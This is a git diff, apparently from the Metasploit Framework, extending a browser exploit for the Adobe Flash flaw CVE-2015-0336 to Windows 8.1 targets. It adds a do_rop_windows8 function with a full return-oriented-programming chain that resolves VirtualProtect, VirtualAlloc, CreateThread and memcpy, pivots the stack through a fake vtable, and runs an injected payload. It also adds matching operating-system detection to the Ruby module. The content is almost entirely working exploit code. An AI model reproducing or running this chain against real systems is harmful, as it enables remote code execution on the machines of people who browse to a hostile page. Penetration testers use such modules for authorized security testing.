diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf index f8492e42e8..8a05ef2a53 100644 Binary files a/data/exploits/CVE-2015-0336/msf.swf and b/data/exploits/CVE-2015-0336/msf.swf differ diff --git a/external/source/exploits/CVE-2015-0336/Exploit.as b/external/source/exploits/CVE-2015-0336/Exploit.as index 9886106f71..01f0f9279f 100644 --- a/external/source/exploits/CVE-2015-0336/Exploit.as +++ b/external/source/exploits/CVE-2015-0336/Exploit.as @@ -30,12 +30,14 @@ package private var b64:Base64Decoder = new Base64Decoder() private var payload:ByteArray private var platform:String + private var os:String private var original_length:uint = 0 public function Exploit() { var i:uint = 0 platform = LoaderInfo(this.root.loaderInfo).parameters.pl + os = LoaderInfo(this.root.loaderInfo).parameters.os trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh var pattern:RegExp = / /g; @@ -118,8 +120,9 @@ package return } - exploiter = new Exploiter(this, platform, payload, uv) + exploiter = new Exploiter(this, platform, os, payload, uv) } + } } diff --git a/external/source/exploits/CVE-2015-0336/Exploiter.as b/external/source/exploits/CVE-2015-0336/Exploiter.as index a56ca190ee..9975dc8b6e 100644 --- a/external/source/exploits/CVE-2015-0336/Exploiter.as +++ b/external/source/exploits/CVE-2015-0336/Exploiter.as @@ -11,6 +11,7 @@ package private var eba:ExploitByteArray private var payload:ByteArray private var platform:String + private var op_system:String private var pos:uint private var byte_array_object:uint private var main:uint @@ -25,11 +26,12 @@ package private var payload_space:Vector. = new Vector.(0x6400) private var spray:Vector. = new Vector.(89698) - public function Exploiter(exp:Exploit, pl:String, p: ByteArray, uv:Vector.):void + public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.):void { exploit = exp payload = p platform = pl + op_system = os ev = new ExploitVector(uv) if (!ev.is_ready()) return @@ -133,12 +135,19 @@ package private function do_rop():void { Logger.log("[*] Exploiter - do_rop()") - if (platform == "linux") + if (platform == "linux") { do_rop_linux() - else if (platform == "win") - do_rop_windows() - else + } else if (platform == "win") { + if (op_system == "Windows 8.1") { + do_rop_windows8() + } else if (op_system == "Windows 7") { + do_rop_windows() + } else { + return + } + } else { return + } } private function do_rop_windows():void @@ -150,7 +159,6 @@ package var kernel32:uint = pe.module("kernel32.dll", winmm) var ntdll:uint = pe.module("ntdll.dll", kernel32) var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32) - var winexec:uint = pe.procedure("WinExec", kernel32) var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32) var createthread:uint = pe.procedure("CreateThread", kernel32) var memcpy:uint = pe.procedure("memcpy", ntdll) @@ -182,14 +190,14 @@ package // VirtualAlloc eba.write(0, memcpy) - eba.write(0, 0x70000000) + eba.write(0, 0x7f6e0000) eba.write(0, 0x4000) eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE // memcpy eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't - eba.write(0, 0x70000000) + eba.write(0, 0x7f6e0000) eba.write(0, payload_address + 8) eba.write(0, payload.length) @@ -198,7 +206,7 @@ package eba.write(0, buffer + 0x10) // return to fix things eba.write(0, 0) eba.write(0, 0) - eba.write(0, 0x70000000) + eba.write(0, 0x7f6e0000) eba.write(0, 0) eba.write(0, 0) eba.write(0, 0) @@ -207,6 +215,73 @@ package exploit.toString() // call method in the fake vtable } + private function do_rop_windows8():void + { + Logger.log("[*] Exploiter - do_rop_windows8()") + var pe:PE = new PE(eba) + var flash:uint = pe.base(vtable) + var winmm:uint = pe.module("winmm.dll", flash) + var advapi32:uint = pe.module("advapi32.dll", flash) + var kernelbase:uint = pe.module("kernelbase.dll", advapi32) + var kernel32:uint = pe.module("kernel32.dll", winmm) + var ntdll:uint = pe.module("ntdll.dll", kernel32) + var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase) + var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase) + var createthread:uint = pe.procedure("CreateThread", kernelbase) + var memcpy:uint = pe.procedure("memcpy", ntdll) + var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash) + var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash) + var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll) + + // Continuation of execution + eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable + eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main + eba.write(0, "\x89\x03", false) // mov [ebx], eax + eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + // Put the payload (command) in memory + eba.write(payload_address + 8, payload, true); // payload + + // Put the fake vtabe / stack on memory + eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability... + eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h] + eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot + eba.write(0, virtualprotect) + + // VirtualProtect + eba.write(0, virtualalloc) + eba.write(0, buffer + 0x10) + eba.write(0, 0x1000) + eba.write(0, 0x40) + eba.write(0, buffer + 0x8) // Writable address (4 bytes) + + // VirtualAlloc + eba.write(0, memcpy) + eba.write(0, 0x7ffd0000) + eba.write(0, 0x4000) + eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE + eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE + + // memcpy + eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't + eba.write(0, 0x7ffd0000) + eba.write(0, payload_address + 8) + eba.write(0, payload.length) + + // CreateThread + eba.write(0, createthread) + eba.write(0, buffer + 0x10) // return to fix things + eba.write(0, 0) + eba.write(0, 0) + eba.write(0, 0x7ffd0000) + eba.write(0, 0) + eba.write(0, 0) + eba.write(0, 0) + + eba.write(main, stack_address + 0x18000) // overwrite with fake vtable + exploit.toString() // call method in the fake vtable + } + private function do_rop_linux():void { Logger.log("[*] Exploiter - do_rop_linux()") @@ -241,8 +316,6 @@ package eba.write(0, "\x5f", false) // pop edi eba.write(0, "\x5e", false) // pop esi eba.write(0, "\xc3", false) // ret - -// eba.write(buffer + 0x10, "\xcc\xcc\xcc\xcc", false) // Put the popen parameters in memory eba.write(payload_address + 0x8, payload, true) // false diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 67bcc9fdc4..f95e2f8dba 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || - os =~ OperatingSystems::Match::WINDOWS_7 + os =~ OperatingSystems::Match::WINDOWS_7 || + os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name @@ -116,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) + os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' @@ -130,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote - + - +